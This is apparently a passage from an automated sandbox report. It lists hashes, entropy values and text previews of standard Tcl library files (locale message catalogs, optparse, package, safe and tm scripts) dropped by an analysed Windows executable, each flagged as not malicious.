                                                                                                                                                                                                                              Size (bytes):1183
                                                                                                                                                                                                                              Entropy (8bit):4.390397293529625
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83ZVUflVdq4qTr6dyX59508THHCh5LbQgWiNv9KvWIn:43PXTtbTngLhWiJGWIn
                                                                                                                                                                                                                              MD5:017F0F989BD5DBBF25E7C797CE09C45C
                                                                                                                                                                                                                              SHA1:162922DBD55A31A74410375A36EE7BC50E092BDD
                                                                                                                                                                                                                              SHA-256:4B85B345D6C43F7257C6849A60A492397FD5FD9D82DF3A2252189D7A1ECCBB64
                                                                                                                                                                                                                              SHA-512:73B6CF395753D863330687404E8A584CB08B81A8CC456DCE7BB49C4EA15EA19E45E3CC1E1367E10915DE14AC6258383289BCFEF55AD2768A50889DF390D37EF9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset tr DAYS_OF_WEEK_ABBREV [list \.. "Paz"\.. "Pzt"\.. "Sal"\.. "\u00c7ar"\.. "Per"\.. "Cum"\.. "Cmt"].. ::msgcat::mcset tr DAYS_OF_WEEK_FULL [list \.. "Pazar"\.. "Pazartesi"\.. "Sal\u0131"\.. "\u00c7ar\u015famba"\.. "Per\u015fembe"\.. "Cuma"\.. "Cumartesi"].. ::msgcat::mcset tr MONTHS_ABBREV [list \.. "Oca"\.. "\u015eub"\.. "Mar"\.. "Nis"\.. "May"\.. "Haz"\.. "Tem"\.. "A\u011fu"\.. "Eyl"\.. "Eki"\.. "Kas"\.. "Ara"\.. ""].. ::msgcat::mcset tr MONTHS_FULL [list \.. "Ocak"\.. "\u015eubat"\.. "Mart"\.. "Nisan"\.. "May\u0131s"\.. "Haziran"\.. "Temmuz"\.. "A\u011fustos"\.. "Eyl\u00fcl"\.. "Ekim"\.. "Kas\u0131m"\.. "Aral\u
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2165
                                                                                                                                                                                                                              Entropy (8bit):4.289021158621493
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:436yILgoQjQPxUIkgPDRQnQ0vVQbC1iQwweIgWQDIoZI7QDI3QbI87IVQnIzQ7mh:2AzUe3EhV8CYgrbH7z3fLVTzgn5jyX7p
                                                                                                                                                                                                                              MD5:323BD95809A44B0BADC71AD36E5F095B
                                                                                                                                                                                                                              SHA1:44F6016873CA955D27545C56CCD24BDB06A83C43
                                                                                                                                                                                                                              SHA-256:7093DA7E39CEB6D3F51EB6CF1CCA2D7F3680ED7B8FE4A5F0CECEEF6BEB21AC77
                                                                                                                                                                                                                              SHA-512:DB16E0E2D17CE47673DE781A7171944C14CC550FB8EB0920C05B979E4D067E36DF0B59B8BFA81F82D8FCE1FFDDAAD2755E68BFE5BC0DBB11E8716A4D18BA5F7E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset uk DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0434"\.. "\u043f\u043d"\.. "\u0432\u0442"\.. "\u0441\u0440"\.. "\u0447\u0442"\.. "\u043f\u0442"\.. "\u0441\u0431"].. ::msgcat::mcset uk DAYS_OF_WEEK_FULL [list \.. "\u043d\u0435\u0434\u0456\u043b\u044f"\.. "\u043f\u043e\u043d\u0435\u0434\u0456\u043b\u043e\u043a"\.. "\u0432\u0456\u0432\u0442\u043e\u0440\u043e\u043a"\.. "\u0441\u0435\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0435\u0440"\.. "\u043f'\u044f\u0442\u043d\u0438\u0446\u044f"\.. "\u0441\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset uk MONTHS_ABBREV [list \.. "\u0441\u0456\u0447"\.. "\u043b\u044e\u0442"\.. "\u0431\u0435\u0440"\.. "\u043a\u0432\u0456\u0442"\.. "\u0442\u0440\u0430\u0432"\.. "\u0447\u0435\u0440\u0432"\.. "\u043b
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1471
                                                                                                                                                                                                                              Entropy (8bit):4.44729506678271
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR836DNjYTP55YAUy2tJ9kyzW68IFYHMBSW1K1pvhv1O:43dbYJyC8ySgI1dV1O
                                                                                                                                                                                                                              MD5:C127F54C462917D3B3EEF5F29F612138
                                                                                                                                                                                                                              SHA1:B1D9A67F856D93F98524C6372B352EA0DE1B9CD3
                                                                                                                                                                                                                              SHA-256:E9B7AECD456F1D2288604C982B5DED0DCF71DCA968C0B0EAFF4CA16CC3B73EC2
                                                                                                                                                                                                                              SHA-512:0B0F132F10580751258D37E070338C3B39DF57FDECDB9D0AFA67E90D6766DDCB4D711876E551ED759D177F1B8F4E9E1DD8F7899F7CB57F8039F55EC4C2984E87
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset vi DAYS_OF_WEEK_ABBREV [list \.. "Th 2"\.. "Th 3"\.. "Th 4"\.. "Th 5"\.. "Th 6"\.. "Th 7"\.. "CN"].. ::msgcat::mcset vi DAYS_OF_WEEK_FULL [list \.. "Th\u01b0\u0301 hai"\.. "Th\u01b0\u0301 ba"\.. "Th\u01b0\u0301 t\u01b0"\.. "Th\u01b0\u0301 n\u0103m"\.. "Th\u01b0\u0301 s\u00e1u"\.. "Th\u01b0\u0301 ba\u0309y"\.. "Chu\u0309 nh\u00e2\u0323t"].. ::msgcat::mcset vi MONTHS_ABBREV [list \.. "Thg 1"\.. "Thg 2"\.. "Thg 3"\.. "Thg 4"\.. "Thg 5"\.. "Thg 6"\.. "Thg 7"\.. "Thg 8"\.. "Thg 9"\.. "Thg 10"\.. "Thg 11"\.. "Thg 12"\.. ""].. ::msgcat::mcset vi MONTHS_FULL [list \.. "Th\u00e1ng m\u00f4\u0323t"\.. "Th\u00e1ng hai"\.. "Th\u00e1ng ba"\.. "Th\u00e1ng t\u01b0"\.. "Th\u00e
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1598), with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3385
                                                                                                                                                                                                                              Entropy (8bit):4.5164095151631125
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43qrY2BBT7uxDqwPqDa8c3FLbYmhyvMDKbW0YGLuoEyke2gdr:2yPTKdo
                                                                                                                                                                                                                              MD5:2F356DE14D48B1091DEAA32D20C38D96
                                                                                                                                                                                                                              SHA1:4AB78D47A73290000955A7C1DFDF7106093F69FD
                                                                                                                                                                                                                              SHA-256:EB247F5184A59414D3DF7E3ECA51F5998C248CFB27D2C02E62A7A30AB35197A7
                                                                                                                                                                                                                              SHA-512:602410830018B455C68AE2EBDD83BA561CF59DA5898E00C80CE7EF619912E591EB38B4C8FE8D9B1F024E7105B0C4D2D326FC855F31E79C1B954429B947DFFBB1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh DAYS_OF_WEEK_ABBREV [list \.. "\u661f\u671f\u65e5"\.. "\u661f\u671f\u4e00"\.. "\u661f\u671f\u4e8c"\.. "\u661f\u671f\u4e09"\.. "\u661f\u671f\u56db"\.. "\u661f\u671f\u4e94"\.. "\u661f\u671f\u516d"].. ::msgcat::mcset zh DAYS_OF_WEEK_FULL [list \.. "\u661f\u671f\u65e5"\.. "\u661f\u671f\u4e00"\.. "\u661f\u671f\u4e8c"\.. "\u661f\u671f\u4e09"\.. "\u661f\u671f\u56db"\.. "\u661f\u671f\u4e94"\.. "\u661f\u671f\u516d"].. ::msgcat::mcset zh MONTHS_ABBREV [list \.. "\u4e00\u6708"\.. "\u4e8c\u6708"\.. "\u4e09\u6708"\.. "\u56db\u6708"\.. "\u4e94\u6708"\.. "\u516d\u6708"\.. "\u4e03\u6708"\.. "\u516b\u6708"\.. "\u4e5d\u6708"\.. "\u5341\u6708"\.. "\u5341\u4e00\u6708"\.. "\u5341\u4e8c\u6708"\.. ""].. ::msgcat::m
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):319
                                                                                                                                                                                                                              Entropy (8bit):5.167825099880243
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoX5YBoHJ+3vtfNrsoHJ+3v6MYBoXa+3vYq9vn:4EnLB383U5YMJ+3vtN3J+3v6LcL3vYqN
                                                                                                                                                                                                                              MD5:9FCDC2E80E13984D434E3CC91E1ED14C
                                                                                                                                                                                                                              SHA1:710D9EE2A71021F4AB609886138EED43C1380ACD
                                                                                                                                                                                                                              SHA-256:4C8A855700FEFE8EE21B08030FF4159D8011AE50353F063229C42DE6292475CF
                                                                                                                                                                                                                              SHA-512:D899A1F58DF1051BB2C2C4AC859C52A2D19B1593C37022A29439B37A8057ADC3941F3564E2E1D9CEB72AE123A4E12E24C3736343AA3A5EC8749AB5AEBBF65085
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_CN DATE_FORMAT "%Y-%m-%e".. ::msgcat::mcset zh_CN TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset zh_CN TIME_FORMAT_12 "%P%I\u65f6%M\u5206%S\u79d2".. ::msgcat::mcset zh_CN DATE_TIME_FORMAT "%Y-%m-%e %k:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):780
                                                                                                                                                                                                                              Entropy (8bit):4.716025632367214
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383HmSBBHZovDh4ToC4qU3WwVW3v6P3v3WwSn:4aR83Hxo14u3Ww+viv3WwS
                                                                                                                                                                                                                              MD5:CFDA7B6463305FA15DBBA72D725A1876
                                                                                                                                                                                                                              SHA1:2BF885073FBAF4A38B7AFDA76CA391F195A5A362
                                                                                                                                                                                                                              SHA-256:7E1C5BD9EC1A17BB851B0DCABD0DFA9FF9D64B89603D9D3FBEAAC609172346AE
                                                                                                                                                                                                                              SHA-512:55F974C706933ECE0575A33C381D9B370B8A408C5C5514C805EC04C8B0CA5BAFAA47267DA98E1805B478A9589FFB7549D79002B2A7AF387049011D78DD7605B6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_HK DAYS_OF_WEEK_ABBREV [list \.. "\u65e5"\.. "\u4e00"\.. "\u4e8c"\.. "\u4e09"\.. "\u56db"\.. "\u4e94"\.. "\u516d"].. ::msgcat::mcset zh_HK MONTHS_ABBREV [list \.. "1\u6708"\.. "2\u6708"\.. "3\u6708"\.. "4\u6708"\.. "5\u6708"\.. "6\u6708"\.. "7\u6708"\.. "8\u6708"\.. "9\u6708"\.. "10\u6708"\.. "11\u6708"\.. "12\u6708"\.. ""].. ::msgcat::mcset zh_HK DATE_FORMAT "%Y\u5e74%m\u6708%e\u65e5".. ::msgcat::mcset zh_HK TIME_FORMAT_12 "%P%I:%M:%S".. ::msgcat::mcset zh_HK DATE_TIME_FORMAT "%Y\u5e74%m\u6708%e\u65e5 %P%I:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):347
                                                                                                                                                                                                                              Entropy (8bit):5.062880051437783
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoOpEoPpFocMohX3v6Zwoh+3v6fxvn:4EnLB383J53v6O3vCn
                                                                                                                                                                                                                              MD5:3218F8E6BEDD534277DE0849C423158E
                                                                                                                                                                                                                              SHA1:10C006446A10406A5644C4033665E877EBF72AF7
                                                                                                                                                                                                                              SHA-256:500546B3211D454659D845B4AB9AEF226125100DF40407C49530DE17CDD4363F
                                                                                                                                                                                                                              SHA-512:3142893DA85BA8F83A5B6851B313B5F5FF80D2B989C1AE015665EE70373249B44EFB4FF7C621F1D8F37AC6019EF5E8D6D21C76C48998C3D9072F9C5060AA8813
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_SG AM "\u4e0a\u5348".. ::msgcat::mcset zh_SG PM "\u4e2d\u5348".. ::msgcat::mcset zh_SG DATE_FORMAT "%d %B %Y".. ::msgcat::mcset zh_SG TIME_FORMAT_12 "%P %I:%M:%S".. ::msgcat::mcset zh_SG DATE_TIME_FORMAT "%d %B %Y %P %I:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):354
                                                                                                                                                                                                                              Entropy (8bit):5.124064818715749
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoAykaRULH/XRxy/5oAyjZRULHi5oAyU/G0OMoAyxW3v6ZQ:4EnLB38315xDOiKRRW3v6F3v8A2n
                                                                                                                                                                                                                              MD5:9010E34791B5DDB7F1E0AD4DA6BD4623
                                                                                                                                                                                                                              SHA1:418F7374BABEF27FEC8E00D3A32F535084593AB9
                                                                                                                                                                                                                              SHA-256:DBA0584B8E1925B439F06E0BF0965E97AFB7EB39E70E0E4C9B70769EBC5F996C
                                                                                                                                                                                                                              SHA-512:D3AB698B725E84DAB06E472C41FF2EB55D63885D22B4598C596800BAC83A02A44CB524524F267D090952AF7E0031F47720786ACF9E354EF672CF9EEFB7DB3BD4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh_TW BCE "\u6c11\u570b\u524d".. ::msgcat::mcset zh_TW CE "\u6c11\u570b".. ::msgcat::mcset zh_TW DATE_FORMAT "%Y/%m/%e".. ::msgcat::mcset zh_TW TIME_FORMAT_12 "%P %I:%M:%S".. ::msgcat::mcset zh_TW DATE_TIME_FORMAT "%Y/%m/%e %P %I:%M:%S %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):33777
                                                                                                                                                                                                                              Entropy (8bit):4.60013086740989
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:4D0xrpIuhenN4kA0G6sRcl5AdtsPLKiF64aJQ2L:HpnhsS9C5Adqua5aJvL
                                                                                                                                                                                                                              MD5:4ECD97188BFED58A15FE22EC566FA6A3
                                                                                                                                                                                                                              SHA1:6E4E91096298F1A0AE6CD4241F167C8B4F661EE5
                                                                                                                                                                                                                              SHA-256:67A157F1873D606B53DC4D894BD8E71F6B1A0DD66177B9513BD039B348B40349
                                                                                                                                                                                                                              SHA-512:1D5067BBB13DAB001168EEB41EBFA2D13BACB0F43A8067CC93923E8F4D062AA387DA23D7D98D6A2AE77D7C849A6026F2343102CBE03690C2CEA0890222339475
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# optparse.tcl --..#..# (private) Option parsing package..# Primarily used internally by the safe:: code...#..#.WARNING: This code will go away in a future release..#.of Tcl. It is NOT supported and you should not rely..#.on it. If your code does rely on this package you..#.may directly incorporate this code into your application.....package require Tcl 8.5-..# When this version number changes, update the pkgIndex.tcl file..# and the install directory in the Makefiles...package provide opt 0.4.8....namespace eval ::tcl {.... # Exported APIs.. namespace export OptKeyRegister OptKeyDelete OptKeyError OptKeyParse \.. OptProc OptProcArgGiven OptParse \... Lempty Lget \.. Lassign Lvarpop Lvarpop1 Lvarset Lvarincr \.. SetMax SetMin......################# Example of use / 'user documentation' ###################.... proc OptCreateTestProc {} {.....# Defines ::tcl::OptParseTest as a test proc with parsed arguments...# (can't be d
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):620
                                                                                                                                                                                                                              Entropy (8bit):4.702477618616754
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:jHxIRu9zhjJS42wbGlTULuUAZb3KykszLYIGbyAkXaqrQ+pBb6:biRUJS42wbGlTUcZ+yk2LY0XaqrB4
                                                                                                                                                                                                                              MD5:07532085501876DCC6882567E014944C
                                                                                                                                                                                                                              SHA1:6BC7A122429373EB8F039B413AD81C408A96CB80
                                                                                                                                                                                                                              SHA-256:6A4ABD2C519A745325C26FB23BE7BBF95252D653A24806EB37FD4AA6A6479AFE
                                                                                                                                                                                                                              SHA-512:0D604E862F3A1A19833EAD99AAF15A9F142178029AB64C71D193CEE4901A0196C1EEDDC2BCE715B7FA958AC45C194E63C77A71E4BE4F9AEDFD5B44CF2A726E76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Tcl package index file, version 1.1..# This file is generated by the "pkg_mkIndex -direct" command..# and sourced either when an application starts up or..# by a "package unknown" script. It invokes the..# "package ifneeded" command to set up package-related..# information so that packages will be loaded automatically..# in response to "package require" commands. When this..# script is sourced, the variable $dir must contain the..# full path name of this file's directory.....if {![package vsatisfies [package provide Tcl] 8.5-]} {return}..package ifneeded opt 0.4.8 [list source [file join $dir optparse.tcl]]..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):23995
                                                                                                                                                                                                                              Entropy (8bit):4.884828325514459
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:8xgjLNILEHsdAW2UfnImRqXqux6XmihmCchzPLrXJjJh6PLfzdklG:8xgjLNImsdnvIm86uGLhLchzDzJ9h6Dn
                                                                                                                                                                                                                              MD5:DDB0AB9842B64114138A8C83C4322027
                                                                                                                                                                                                                              SHA1:ECCACDC2CCD86A452B21F3CF0933FD41125DE790
                                                                                                                                                                                                                              SHA-256:F46AB61CDEBE3AA45FA7E61A48930D64A0D0E7E94D04D6BF244F48C36CAFE948
                                                                                                                                                                                                                              SHA-512:C0CF718258B4D59675C088551060B34CE2BC8638958722583AC2313DC354223BFEF793B02F1316E522A14C7BA9BED219531D505DE94DC3C417FC99D216A01463
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# package.tcl --..#..# utility procs formerly in init.tcl which can be loaded on demand..# for package management...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....namespace eval tcl::Pkg {}....# ::tcl::Pkg::CompareExtension --..#..# Used internally by pkg_mkIndex to compare the extension of a file to a given..# extension. On Windows, it uses a case-insensitive comparison because the..# file system can be file insensitive...#..# Arguments:..# fileName.name of a file whose extension is compared..# ext..(optional) The extension to compare against; you must..#..provide the starting dot...#..Defaults to [info sharedlibextension]..#..# Results:..# Returns 1 if the extension matches, 0 otherwise....proc tcl::Pkg::CompareExtension {fileName {ext {}}} {.. global tcl_platfor
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):844
                                                                                                                                                                                                                              Entropy (8bit):4.883013702569192
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:TF7S2n2wn2SNHaeYF9xcwrmXhbs1GUiSYX3EtSK78ex4VIpynEw88/McUBbPgnz:TF7Hn2wnlk2KwyZSM4SkV/3UB7Cz
                                                                                                                                                                                                                              MD5:577787C2F4F5956BA70F83012B980AE5
                                                                                                                                                                                                                              SHA1:040B2469F796F3FDFCD1E1DD2EB1C5B799EDEF62
                                                                                                                                                                                                                              SHA-256:E269029C8263E3CBC1920C3604ECDCF15EDCCB208A0D68F9EB42B73954D620C0
                                                                                                                                                                                                                              SHA-512:C2940F6F3D77412EFC537B8AB67352F519DFFA95739FCC17BF1817335AFD9E5BFE91ABE98CBA99E278CB4923D4E6D431ED9D72282745203C0F7D73193F550238
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# parray:..# Print the contents of a global array on stdout...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....proc parray {a {pattern *}} {.. upvar 1 $a array.. if {![array exists array]} {...return -code error "\"$a\" isn't an array".. }.. set maxl 0.. set names [lsort [array names array $pattern]].. foreach name $names {...if {[string length $name] > $maxl} {... set maxl [string length $name]...}.. }.. set maxl [expr {$maxl + [string length $a] + 2}].. foreach name $names {...set nameString [format %s(%s) $a $name]...puts stdout [format "%-*s = %s" $maxl $nameString $array($name)].. }..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):42223
                                                                                                                                                                                                                              Entropy (8bit):4.822635446297551
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:H/Jo8y7AyARYhZfc3njlVdRIp4xOtoYx4WneNiBq5vIhfwEaqadlUCJ2Pbb1P6:H/c7AmhZmnjvdRIG924WneNiBq5+fwEc
                                                                                                                                                                                                                              MD5:B8C1561D471CFBF4111C706411D59883
                                                                                                                                                                                                                              SHA1:71483EAEEF377EE9AF90BEC44F70C7B12C5BC720
                                                                                                                                                                                                                              SHA-256:C21DCE3AB31893118BBED01E559070F1D3541877FEE331BD45F5BF4300ED9654
                                                                                                                                                                                                                              SHA-512:465065A938C71AF4588B3331B51A62DD57F57492EB1CB6C0F52B9FD0A2FE7A54B1E995AA56E4A41D7A99EAFF665C1E23E3B240FB3F9840AB242C21B1DBFFFF45
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# safe.tcl --..#..# This file provide a safe loading/sourcing mechanism for safe interpreters...# It implements a virtual path mechanism to hide the real pathnames from the..# child. It runs in a parent interpreter and sets up data structure and..# aliases that will be invoked when used from a child interpreter...#..# See the safe.n man page for details...#..# Copyright (c) 1996-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....#..# The implementation is based on namespaces. These naming conventions are..# followed:..# Private procs starts with uppercase...# Public procs are exported and starts with lowercase..#....# Needed utilities package..package require opt 0.4.8....# Create the safe namespace..namespace eval ::safe {.. # Exported API:.. namespace export interpCreate interpInit interpConfigure interpDelete \...interpAddToAccessPath interpFindInAccessPath setL
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5617
                                                                                                                                                                                                                              Entropy (8bit):4.747404679682368
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:eOaVhNUMUuUQU2UsUIUbUEUEeUkgU6UWSO0DT5RTdcvsilrvs+jscMK57ehXowrz:ejVHRRLP3LWDXewTbSO0DT5RTdcvsilg
                                                                                                                                                                                                                              MD5:C62FB22F4C9A3EFF286C18421397AAF4
                                                                                                                                                                                                                              SHA1:4A49B8768CFF68F2EFFAF21264343B7C632A51B2
                                                                                                                                                                                                                              SHA-256:DDF7E42DEF37888AD0A564AA4F8CA95F4EEC942CEBEBFCA851D35515104D5C89
                                                                                                                                                                                                                              SHA-512:558D401CB6AF8CE3641AF55CAEBC9C5005AB843EE84F60C6D55AFBBC7F7129DA9C58C2F55C887C3159107546FA6BC13FFC4CCA63EA8841D7160B8AA99161A185
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Tcl autoload index file, version 2.0..# -*- tcl -*-..# This file is generated by the "auto_mkindex" command..# and sourced to set up indexing information for one or..# more commands. Typically each line is a command that..# sets an element in the auto_index array, where the..# element name is the name of a command and the value is..# a script that loads the command.....set auto_index(auto_reset) [list source [file join $dir auto.tcl]]..set auto_index(tcl_findLibrary) [list source [file join $dir auto.tcl]]..set auto_index(auto_mkindex) [list source [file join $dir auto.tcl]]..set auto_index(auto_mkindex_old) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::init) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::cleanup) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::mkindex) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::hook) [list source [file join $dir auto.t
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12204
                                                                                                                                                                                                                              Entropy (8bit):4.763796758810551
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:55CjnlRfMKqaOH5bE2KjNkkpgpCmqkkuowUh9PTYMsvSO+xy8h/vuKisM68E:5q3MKYH5bE1jNkkpgomq/uCPTYMC+k83
                                                                                                                                                                                                                              MD5:215262A286E7F0A14F22DB1AA7875F05
                                                                                                                                                                                                                              SHA1:66B942BA6D3120EF8D5840FCDEB06242A47491FF
                                                                                                                                                                                                                              SHA-256:4B7ED9FD2363D6876092DB3F720CBDDF97E72B86B519403539BA96E1C815ED8F
                                                                                                                                                                                                                              SHA-512:6ECD745D7DA9D826240C0AB59023C703C94B158AE48C1410FAA961A8EDB512976A4F15AE8DEF099B58719ADF0D2A9C37E6F29F54D39C1AB7EE81FA333A60F39B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# -*- tcl -*-..#..# Searching for Tcl Modules. Defines a procedure, declares it as the primary..# command for finding packages, however also uses the former 'package unknown'..# command as a fallback...#..# Locates all possible packages in a directory via a less restricted glob. The..# targeted directory is derived from the name of the requested package, i.e...# the TM scan will look only at directories which can contain the requested..# package. It will register all packages it found in the directory so that..# future requests have a higher chance of being fulfilled by the ifneeded..# database without having to come to us again...#..# We do not remember where we have been and simply rescan targeted directories..# when invoked again. The reasoning is this:..#..# - The only way we get back to the same directory is if someone is trying to..# [package require] something that wasn't there on the first scan...#..# Either..# 1) It is there now: If we rescan, you get it; if not you don
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
